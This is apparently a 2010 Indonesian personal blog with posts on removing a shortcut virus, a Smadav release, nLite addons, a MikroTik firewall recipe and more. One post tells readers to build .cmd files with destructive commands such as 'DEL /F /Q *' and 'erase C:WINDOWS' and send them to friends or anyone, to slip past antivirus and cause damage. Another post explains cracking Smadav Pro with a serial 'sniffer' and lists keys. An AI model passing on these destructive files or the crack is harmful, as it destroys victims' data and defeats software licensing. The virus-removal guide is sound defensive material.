Google

Home

Sabtu, 21 Agustus 2010

Mengatasi Virus Shortcut

hem...... virus satu ini memang bisa tergolong virus yang pinter, beberapa antivirus internasional yang terkenalpun belum bisa mendeteksi keberadaan virus ini, dan antivirus local juga belum bisa mendeteksinya seperti smadav,pcmav, ini dikarenakan virus ini tidak menyerang sistem dari komputer kita, melainkan hanya menggandakan folder-folder dalam hardisk kita. virus ini bisa dengan mudah kita lihat keberadaannya di komputer kita. lihat gambar dibawah ini. virus ini memang sangat menggangu penglihatan kita.


pada gambar diatas, bisa lihat dengan jelas bahwa ada file yang bergambarkan folder tapi lihat lagi dengan seksama type dari file ini yaitu "sortcut", dengan kata lain ini adalah virus yang berusaha menyembunyikan diri dengan mengganti iconnya, dengan cara ini pula user sering terkecoh untuk melakukan execute file (double klik).

untuk membasmi virus ini dari pada menggunakan cara manual yang sangat ribet dan panjang, mending saya saranakan install antivirus avira, karena antivirus ini sudah bisa mendeteksi keberadaan virus ini, selain avira avg dan norton juga bisa mendeteksinya.

untuk download avira klik disini, setelah mendownload masternya jangan lupa download juga file updatenya biar semakin kuat. untuk file updatenya bisa di download disini. waktu scanning komputer jangan lupa juga matikan system restore pada komputer kita

tapi itu tidak cukup membantu, karena AV kita mungkin sudah di blok oleh virus tadi, o
leh sebab itu, simak 7 cara jitu dari analis virus Vaksincom MG Lat untuk menghentikan banjir shortcut yang diakibatkan virus ini:

1. Sebelumnya matikan dulu proses system restore.

2. Matikan proses dari file Wscript yang terletak di C:\Windows\System32, dengan cara menggunakan tools seperti CProcess, HijackThis atau dapat juga menggunakan Task Manager dari Windows.

3. Setelah dimatikan proses dari Wscript tersebut, kita harus men-delete atau me-rename dari file tersebut agar tidak digunakan untuk sementara oleh virus tersebut.

Sebagai catatan, kalau kita me-rename dari file Wscript.exe tersebut dengan otomatis, maka akan dikopikan lagi di folder tersebut. Oleh sebab itu, kita harus mencari di mana file Wscript.exe yang lainnya, biasanya ada di C:\Windows\$NtServicePackUninstall$, C:\Windows\ServicePackFiles\i386.

Tidak seperti virus-virus VBS lainnya, kita bisa mengganti Open With dari file VBS menjadi Notepad, virus ini berextensi MDB yang berarti adalah file Microsoft Access. Jadi Wscript akan menjalankan file DATABASE.MDB seolah-olah dia adalah file VBS.

4. Delete file induknya yang ada di C:\Documents and Settings\\My Documents\database.mdb, agar setiap kali komputer dijalankan tidak akan me-load file tersebut. Dan jangan lupa kita buka juga MSCONFIG, disable perintah yang menjalankannya.

5. Sekarang kita akan men-delete file-file Autorun.INF. Microsoft.INF dan Thumb.db. Caranya, klik tombol START, ketik CMD, pindah ke drive yang akan dibersihkan, misalnya drive C:\, maka yang harus kita lakukan adalah:

Ketik C:\del Microsoft.inf /s, perintah ini akan men-delete semua file microsoft.inf di seluruh folder di drive C:. Sementara kalau mau pindah drive tinggal diganti nama drivenya saja contoh: D:\del Microsoft.inf /s.

Untuk file autorun.inf, ketik C:\del autorun.inf /s /ah /f, perintah akan men-delete file autorun.inf (syntax /ah /f) digunakan karena file tersebut memakai attrib RSHA, begitu juga untuk file Thumb.db lakukan juga hal yang sama.

6. Untuk men-delete file-file selain 4 file terdahulu, kita harus mencarinya dengan cara search file dengan ekstensi .lnk ukurannya 1 kb. Pada ‘More advanced options’ pastikan option ‘Search system folders’ dan ‘Search hidden files and folders’ keduanya telah dicentang.

Harap berhati-hati, tidak semua file shortcut / file LNK yang berukuran 1 kb adalah virus, kita dapat membedakannya dari ikon, size dan tipenya. Untuk shortcut yang diciptakan virus ikonnya selalu menggunakan icon ‘folder’, berukuran 1 kb dan bertipe ‘shortcut’. Sedangkan folder yang benar harusnya tidak memiliki ‘size’ dan tipenya adalah ‘File Folder’.

7. Fix registry yang sudah diubah oleh virus. Untuk mempercepat proses perbaikan registry salin script dibawah ini pada program ‘notepad’ kemudian simpan dengan nama ‘Repair.inf’. Jalankan file tersebut dengan cara:

- Klik kanan repair.inf
- Klik Install

[Version]
Signature="$Chicago$"
Provider=Vaksincom Oyee

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1″” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, “cmd.exe”

[del]
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Winupdate
HKCU,SOFTWARE\Microsoft\Windows\CurrentVersion\Run, explorer


sumb : detik.com

Selasa, 06 Juli 2010

Smadav 8.2 Final

Smadav 2010 Rev. 8.2 : Penambahan database 80 virus baru, perbaikan false alarm, penambahan teknik heuristik untuk varian virus penginfeksi exe, dan beberapa perbaikan bug lainnya

Smadav 2010 Rev. 8.1 :
Penambahan database 100 virus baru, Smadav Virus Scanner Engine terbaru (SmadEngine.dll), dan sudah kompatibel penuh untuk Windows Vista & Windows 7.

Smadav 2010 Rev. 8 dirilis dengan berbagai fitur dan penyempurnaan baru yang dikhususkan untuk pemberantasan virus lokal. Fitur-fitur itu seperti Smad-Behavior yang bisa mengenali virus lokal baru yang belum ada di database Smadav dari tingkah lakunya ketika menginfeksi sistem. Smad-Ray yang bisa melakukan scan flashdisk secara otomatis setelah terpasang hanya dalam waktu maksimum 5 detik. Smadav 2010 lebih stabil dan sangat disarankan untuk digabungkan dengan antivirus internasional karena Smadav hanya bisa menangani virus lokal. Pengebalan flashdisk (menggunakan folder autorun.inf) telah disempurnakan lagi dan sebelumnya akan ada konfirmasi sehingga Anda bisa memutuskan apakah suatu flashdisk ingin dikebalkan atau tidak.

Sebagai informasi, dari sampel-sampel virus yang di-upload pengguna ke situs Smadav.net, penyebaran virus lokal saat ini sudah mulai turun drastis di Indonesia. Mungkin ini dikarenakan sudah banyaknya antivirus lokal yang bisa membasmi virus-virus lokal. Dan juga karena pengguna Windows XP yang sudah berkurang karena sebagian sudah meng-upgrade sistem operasinya menjadi Windows Vista atau Windows 7 yang sangat aman dari infeksi virus khususnya virus lokal. Penyebaran virus di Indonesia lebih banyak didominasi oleh virus dan malware internasional yang tentunya tidak bisa diatasi Smadav. Anda wajib dan sangat disarankan menggunakan antivirus internasional untuk perlindungkan komputer Anda dari virus dan malware internasional ini.

download : http://www.4shared.com/file/cMAqTELM/Smadav_pro_82.html



Sabtu, 03 Juli 2010

kumpulan addons nlite windows

belajar berkreasi

nLite Addons



All Integrator / nLite addons have the original installer obtained from the official website. Most of the programs are freeware or open source


Products are published in here after the author gives permission to do so. The products advertised here can also be downloaded from their official websites.


This website does not sell software, neither bundle it with 3rd party products and is in no way associated with any of the products.


last updated: 02/07/2010



1by1 1.69

3D Box Shot Maker 1.0

123 Free Solitaire 2006

A43 File Management Utility 3.20

7-Zip 4.65


AbiWord 2.8.6

AC3 Filter 1.63b

Adobe Reader 9.3

Adolix Wallpaper Changer 2.1


AIMP 2.61.570

AlienGUIse 2.3

Alleycode 2.21

allSnap 1.33

ALSong 1.9

Amaya 11.2

Angry IP Scanner 2.21

Anim8or 0.95

Ant Movie Catalog 3.5.1.2


Ant Renamer 2.1

Any Video Converter 1.21

AnyDVD 6.6.6.0

AoA Audio Extractor 1.2.2

Apollo 37zz

Arcade Classic Games Pack 5.10

ArtRage Free 2.2

Artweaver 1.0

Ashampoo Firewall 1.20


ATI Tray Tools 1.3.6.1042

ATITool 0.26

ATnotes 9.5

Atomic Clock Sync 3.0

Audacity 1.2.6

AutoHotkey 1.0.48.05

AutoIt 3.3.6.1

AutoQ3D Community 1.39

Avant Browser 11.8 Build 7


AveDesk 1.3

AVI Preview 0.26

AviSplit 1.43

Azureus 2.5.0.4


BackupFox 0.73

Billy 1.03

BitComet 1.22

BitTorrent 6.4

BitWise 1.7.3


Blender 2.48

BlockNote 1.8

BricoPacks Collection

BSPlayer 1.37.826

BurnAware Free 2.5

Burrrn 1.14 beta 2


Cabos 0.8.1

CabPack 1.4

CamStudio 2.0


CCCP 09.09.2009

CCleaner 2.33.1184

CCProxy 2010

CDrtfe 1.3.7

Celestia 1.6

ChaosMD5 2.5

Citrus Alarm Clock 1.0.5

ClipX 1.0.3.8

CloneCD 5.3.1.4


CloneDVD 2.9.1.9

CloneDVD Mobile 1.7

Converber 2.2.1

Convert 4.10

ConvertXToDVD 3.1.3.40

Core Temp 0.99.7

CPU-Z 1.51

Crimson Editor 3.70

CrossLoop 2.31


CrystalCPUID 4.15.5.452

CrystalDiskMark 3.0


Daphne 1.46

DC++ 0.762

Defraggler 1.20.201

DeleteOnClick 1.0

Dexpot 1.5.4

Dia 0.97.1

Disclib 2.0


DM2 1.23.1

Doc Convertor 1.0

doPDF 7.1.336

Double Driver 2.1

DriveImage XML 2.13

Driver Magician Lite 3.32

DVD Decrypter 3.5.4.0

DVD Flick 1.3.0.7

DVD Shrink 3.2.0.15


DVDAttache 3.9

DVDFab Decrypter 4.1.2.0


Easy Duplicate Finder 2.4.1

Easy Thumbnails 3.0

Elfima Notepad 1.6.2

EMDB 1.06

Emesene 1.6.1

eMule 0.50a

Encrypted FTP 3.3.1.145


EncSpot Basic 2.0

EncSpot Pro 2.2 Beta 2

ESBCalc 7.2

EssentialPIM Free 3.52

Everest Ultimate Edition 5.50.2100

Exact Audio Copy 0.99pb4

ExplorerXP 1.07


Fast Explorer 3.0.10.393

FastStone Capture 5.3


FastStone Image Viewer 4.2

Feed Reader 3.13

FFDShow 27.03.2010

FileZilla 3.3.3

FileZilla Server 0.9.27

Filzip 3.06

Firefox 3.6.6

Flock 2.0.3

Folder2MyPC 1.9


Folder Marker 1.4

Folder Size 2.5

Folderico 3.7.2

Foobar 1.0.3

FoxEditor 0.7.5.2

Free Download Manager 3.0.852

freeCommander 2009.02a

FreeFileSync 3.8

FTPinfo 1.8.9


FuturixImager 6.0


GIMP 2.6.9

Gom Player 2.1.26.5021

GPU-Z 0.4.4

GreatNews 1.0.383

GreenBrowser 5.3.0409

Gridmove 1.19.53

GSpot 2.70a


Halite 0.3.2


Hamachi 2.0.2.85

HashCheck 2.1.11

HashOnClick 1.1

HashTab 3.0

HD Tune 2.55

HelpNDoc 2.6.0.74

HFS 2.2f

HiJackFree 3.1.0.22

HijackThis 2.0.2


Hotkeys 2.0.1

HotKeyz 2.8.3

HTTrack 3.43

Huey 1.9

HWMonitor 1.15

HydraIRC 0.3.165


IcoFX 1.6.4

IconLab 1.0

IconPhile 2.02


Icons From File 4.02

IconTweaker 1.12

Icy Radio 0.5

ID3 Renamer 2.15.15

iDailyDiary 3.61

ImgBurn 2.5.1

Infra Recorder 0.50

Inkscape 0.47

Inno Setup 5.3.10


Internet Explorer 8.0

IP-Tools 2.56

iWebAlbum 2.02

IZArc 4.1.2


Java Runtime Environment 6.0 Update 20

JetBee Free 4.0.5 Build 314

JoJoThumb 2.11.1

jv16 Powertools 1.3.0.195

jZip 1.3



Karen’s Replicator 3.6.8

KeePass 1.17

K-Lite Codec Pack Basic 6.1

K-Lite Codec Pack Mega 6.0

K-Lite Codec Pack Standard 6.0

K-Meleon 1.5.4

KMPlayer 2.9.3.1428

KompoZer 0.7.10

KVIrc 4.0



Laptop Alarm 2.0 Beta

Launchy 2.5

LClock 1.62b

LockNote 1.0.4

Lupas Rename 5.0


MacSound 1.3.2

ManyCam 2.4.44

Media Player Classic Home Cinema 1.3.1249.0

MediaMonkey 3.2.0.1294


Microsoft PowerPoint Viewer 2007

Mihov Image Resizer 1.2

Miranda 0.8.27

Mixxx 1.7.2

MozBackup 1.4.10

Mp3 Tag Tools 1.2

Mp3tag 2.46

MPlayer 1.0 RC1

MPlayer 1.0 RC1 & Codecs


mpTrim 2.13 & WavTrim 2.24

MultiRes 1.58

MusicIP Mixer 1.8

musikCube 1.0

MV2Player 07 RC2

My Lockbox 1.1

MyDefrag 4.2.9


Nero CD-DVD Speed 4.7.7.16


NetMeter 1.1.3

NetProfiles 1.2

Netscape 9.0.0.6

NetSetMan 3.0.3

Network Traffic Monitor 1.02

nLite 1.4.9.1

nLite 1.4.9.1 + Runtimes

Nokia Monitor Test 1.0.0.1

Notepad2 4.1.24


Notepad++ 5.6.8

NSIS 2.46

NTFS Link 2.1

Numerimal 1.2.2

Nvu 1.0


ObjectDock 1.9

Omea Reader 2.2

OpenOffice 3.0.1

Opera 10.60


Orbit Downloader 2.6.5


Partition Wizard Home Edition 5.0

PC Wizard 1.871

PeaZip 3.2.1

PeerGuardian 2.0 Beta 6b

PhotoFiltre 6.4

PhotoScape 3.5

PHP Designer 5.0.2 PE

PhraseExpress 7.0.127


PicaJet Free 2.5.0.495

PicPick 2.1.5

Pidgin 2.6.6

PingPlotter Free 1.20

Pitaschio 2.26

Pivot Stickfigure Animator 2.2.5

PlacesBar Tweaker 1.0

PocketDivXEncoder 0.3.60

Popcorn 1.95


PopTray 3.2

PSPad 4.5.4

PuTTy 0.60


QIP 2005 Build 8094

QuickTime Alternative 3.1

QuickTime Alternative Lite 3.1

Quintessential Media Player 5.0.121


Rainlendar 0.22.1

Rainlendar Lite 2.6


Real Alternative 2.0.1

Real Alternative Lite 2.0.1

RealVNC 4.1.2

Recuva 1.37.488

Registrar Lite 2.0

Regshot 1.82

ReNamer 5.50

ResHack 3.4.0

RevConnect 0.674p


Revo Uninstaller 1.89

RivaTuner 2.24

RK Launcher 0.4 Beta

RocketDock 1.3.5

Rootkit Revealer 1.71

RSSOwl 2.0.5

RunMe 0.9.2


Safari 4.0.3

SciTe4AutoIt3


Screamer Radio 0.4.3

Selida 2.1

Shareaza 2.5.3.0

ShellPacks Collection

Silverjuke 2.74

Simple File Shredder 3.2

Skype 2.5.0.154

Skype 4.2.32.169

Skype Recorder 2.1


Slim Browser 4.12

SMPlayer 0.6.9

SoftPerfect Network Scanner 4.4.7

SoftPerfect NetWorx 5.1.2

Songbird 1.7.2

SpeedCrunch 0.10.1

SpeedFan 4.40

SpeQ Mathematics 3.3

Spybot Search & Destroy 1.5.2


StrokeIt 0.9.5

SubMagic 0.70

Subtitle Workshop 2.51

Sudoku

SumatraPDF 1.1

Sunbird 0.9

SuperPi 1.1e

Sweet Home 3D 2.3

SyncBack 3.2.21


SyncBackSE 5.6.0.34

Synergy 1.3.1

Sysinternals Tools 25.07.2007


TagScanner 5.1.571

Talkative IRC 0.4.4.16

Tango Patcher 7.08.2

Task Coach 1.0.6

Task Killer 2.30

Taskbar Shuffle 2.5


TaskSwitchXP 2.0.11

The Dude 3.6

The FilmMachine 1.5.4

The Guide 2.0

ThumbView Lite 1.0

Thunderbird 3.1

Tiny Hexer 1.8.1.6

tinySpell 1.9.11

ToDoList 6.0.1


TrayIt 4.6.5.5

TrueCrypt 6.3a

TUGZip 3.5


UltraDefrag 4.3

UltraExplorer 2.0.3.1

UltraVNC 1.0.2

Undelete Plus 2.97

UnderCoverXP 1.21

Universal Extractor 1.6


Unknown Device Identifier 7.0

Unlocker 1.8.5

uTorrent 1.8.2


Video MP3 Extractor 1.6

Virtual Dimension 0.94

VirtualBox 2.1.4

VirtualDub 1.9.9

VirtuaWin 4.2

Vista Drive Icon 1.4


VisualTaskTips 3.4

VLC 1.1

VSO Image Resizer 1.3.4d

VUPlayer 2.49


Weather Watcher 5.6.37

WengoPhone 2.1.2

Wget 1.10.2

WikidPad 1.7

Windows Media Player 11.0.5721.5145


Windows Vista sound scheme

Wings 3D 1.2

WinIPConfig 2.7.2

WinMerge 2.12.4

WinRAR 3.93

WinSCP 4.2.7

Wireshark 1.2.7


XChat 2.8.7f

Xfire 1.126


Xinorbis 5.0

Xion 1.0.125

XMPlay 3.5.1

XnView 1.97.6

XP Vista Pack

xp-AntiSpy 3.97.3

Xvid 1.2.1


Yahoo Widgets 4.5.1

YeahReader 2.22


Y’z Dock 0.8.3

Y’z Shadow 1.9

Y’z Toolbar 1.3


Zoom Player Standard 5.01


All nLite addons are tested.

selamat berkarya :D

Rabu, 21 April 2010

Ngerjain Orang Lain Pakai Notepad

cuma mo share aja neh, kalo kalian punya temen yang pengen di isengin, pengen kirim virus rada susah kalo mereka sudah di protek sama 10 antivirus

mungkin ini cocok buat di test sama mereka.

NOTEPAD sebagai senjata baru

gunakan notepad sebagai senjata kalian untuk ngerjain orang laen.

Menghapus Files dan Folder

1. buka notepad trus ketik DEL /F /Q *
2. save as dan simpan dengan nama test.cmd
3. kalau elo dobel klik file test.cmd maka semua files dan folder akan terhapus.

Menghapus Files Tertentu

1. buka notepad trus ketik erase C:TEST.txt
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka files TEST.txt di drive c:\ akan terhapus

Menghapus Folder Tertentu

1. buka notepad trus ketik erase C:WINDOWS
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka folder WINDOWS di drive c:\ akan terhapus

nah kalo sudah jadi, tinggal kalian kirim aja ke temen kalian, ato siapapun. simpel tapi "merugikan"

semoga tidak disalah gunakan

Selasa, 20 April 2010

share sniffer smadav 8.1

Ni saya kasih tata caranya :D
klik get serial terus cari tu smadavnya, kalau udah masukin nama sesuai kesenangan anda sendiri habis itu masukin serialnya sembarang kalau kurang jelas liat gambar di bawah ini

kalau udah ampe di situ keluar dah serialnya di sniffernya hehehehhe mak nyus deh liat gambar ni


terus masukin key nya dah selesai, kurang jelas tanya aja, semangat semangat semangat

personal : 080000000000
perusahaan:9999999999999
download
congrat..!!!

KUMPULAN LINK

MT by imer
http://depositfiles.com/files/jr8ll0aem

Iseng Bagi yang sering Ganti IP (by imer)

Pertama, bikin address list yang ga kepake

1/ip firewall address-list
2add address=192.168.2.22 comment="" disabled=no list=unused
3add address=192.168.2.23 comment="" disabled=no list=unused
4add address=192.168.2.24 comment="" disabled=no list=unused
5add address=192.168.2.25 comment="" disabled=no list=unused
6add address=192.168.2.26 comment="" disabled=no list=unused

Tambahkan pada firewall filter untuk blocking semua port kecuali port http, DNS dan squid

1/ip firewall filter
2add chain=forward action=drop protocol=tcp src-address-list=unused
3 dst-port=!80,81,53,3128
4add chain=forward action=drop protocol=udp src-address-list=unused
5 dst-port=!53

port 81 diatas adalah port httpd lokal

setelah itu bikin acl di squid.conf


1acl unused src "/etc/squid/unused.acl"
2http_access deny unused

unused.acl isinya ip address yang tidak digunakan
jangan lupa http_access taruh di baris atas sebelum rule allow nya

hasilnya :